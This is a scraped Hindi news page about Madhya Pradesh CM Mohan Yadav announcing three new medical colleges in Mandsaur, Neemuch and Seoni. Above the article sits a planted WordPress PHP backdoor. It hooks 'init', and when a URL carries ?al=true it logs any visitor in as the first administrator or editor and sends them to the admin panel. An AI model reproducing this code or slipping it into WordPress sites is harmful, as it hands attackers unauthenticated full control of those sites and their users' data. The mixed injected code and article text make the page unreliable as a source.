// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); CM मोहन ने किया ऐलान, MP के इन जिलों में इसी सत्र से खुलेंगे 3 नए मेडिकल कॉलेज – प्रत्युषा आशा की नयी किरण
मध्यप्रदेश

CM मोहन ने किया ऐलान, MP के इन जिलों में इसी सत्र से खुलेंगे 3 नए मेडिकल कॉलेज

भोपाल

मध्य प्रदेश के तीन जिलों में तीन नए मेडिकल कॉलेजों की शुरुआत इसी सत्र से होगी, सीएम मोहन यादव ने इस बात का ऐलान कर दिया है. ऐसे में इन जिलों के लोगों को इलाज के लिए अब दूसरे जिलों में नहीं जाना होगा. इन जिलों में मेडिकल कॉलेज खोले जाने की मांग लंबे समय से चल रही थी. जिसे कैबिनेट की बैठक में पास किया गया था. ऐसे में अब इन जिलों में मेडिकल कॉलेज की सुविधा मिलनी शुरू हो जाएगी. इन जिलों में नीमच जिला भी शामिल है.

इन जिलों में खुलेंगे मेडिकल कॉलेज

मध्य प्रदेश के मंदसौर, नीमच और सिवनी जिले में इसी सत्र से मेडिकल कॉलेज खुलने जा रहे हैं. नेशनल मेडिकल काउंसिल की तरफ से इन कॉलेजों के लिए 50-50 सीटों पर एडमिशन के लिए मंजूरी भी मिल गई है. यानि तीनों कॉलेजों में इसी सत्र से कुल 150 सीटों पर एमबीबीएस की पढ़ाई शुरू हो जाएगी. जिसके बाद प्रदेश में एमबीबीएस की कुल सीटें 2 हजार 425 हो जाएगी.

प्रदेश के उपमुख्यमंत्री और स्वास्थ्य मंत्री राजेंद्र शुक्ला की तरफ से बताया गया कि मंदसौर, नीमच और सिवनी में इस सत्र से कॉलेज शुरू होंगे, जबकि सिंगरौली और श्योपुर में कॉलेजों की नियुक्ति की प्रक्रिया भी शुरू हो चुकी है. यानि अगले सत्र से भी प्रदेश में दो और नए मेडिकल कॉलेज खोले जाएंगे. इन जिलों में मेडिकल कॉलेज खोले जाने से डॉक्टरी की पढ़ाई करने वाले छात्रों को तो फायदा होगा ही साथ ही जिले के लोगों के लिए इलाज के लिए भी परेशान नहीं होना पड़ेगा.

सीएम ने जताई खुशी

वहीं प्रदेश को एक साथ तीन मेडिकल कॉलेज की सुविधा मिलने पर सीएम मोहन यादव ने भी खुशी जताई है. उन्होंने कहा कि यह तीनों मेडिकल कॉलेज खुलना प्रदेश के लिए खुशी की बात है. हमारा प्रयास है कि हर जिले में मेडिकल कॉलेज हो. कुछ जिलों में पीपीपी मोड पर मेडिकल कॉलेज खोलने की तैयारियां की जा रही हैं. जल्द ही इसे भी पूरा किया जाएगा. प्रदेश के लोगों को सभी तरह की सुविधाएं मिल सके इस बात का पूरा ध्यान रखा जा रहा है. 

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]